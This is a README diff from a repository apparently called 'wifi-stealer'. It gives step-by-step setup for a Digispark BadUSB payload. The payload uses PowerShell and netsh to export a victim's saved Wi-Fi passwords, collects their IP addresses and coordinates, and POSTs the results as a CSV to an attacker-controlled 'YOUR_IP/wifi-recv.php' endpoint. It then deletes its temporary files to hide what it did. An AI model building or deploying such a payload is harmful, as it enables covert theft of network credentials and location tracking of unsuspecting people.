Zypher17/wifi-stealer/README.md

 $u='http://YOUR_IP/wifi-recv.php';
 ```

-Replace `YOUR_IP` with the IP of your Kali or Windows server (for example `http://192.168.1.10/wifi-recv.php` on your LAN).
+Replace `YOUR_IP` with the IP of your Kali or Windows server.

-3. Make sure the payload sends **raw CSV** to `wifi-recv.php` in this format:
+3. The payload should:

-- Export Wi‑Fi profiles to `%TEMP%` using `netsh wlan export profile`.
+- Export Wi‑Fi profiles using `netsh wlan export profile` to `%TEMP%`.
-- Parse each `Wi-Fi-*.xml` file to build objects with properties:
+- Parse each `Wi-Fi-*.xml` file and build objects with fields:
   `Time, VictimID, SSID, Pass, VictimLANIP, OS, PublicIP, LANextra, Lat, Lon, PacketSummary`.
-- Export these objects as CSV to something like `%TEMP%\w.csv`.
+- Export these objects as CSV to `%TEMP%\w.csv`.
-- Use `Invoke-WebRequest` to POST the contents of that CSV as the body to `http://YOUR_IP/wifi-recv.php`.
+- Use `Invoke-WebRequest` to POST the CSV contents to `http://YOUR_IP/wifi-recv.php`.
-- Delete the XML and CSV files and exit PowerShell when done.
+- Delete XML and CSV temp files and exit PowerShell.

 4. Click **Upload** in Arduino IDE.
 5. When Arduino IDE says `Plug in device now...`, plug in the Digispark.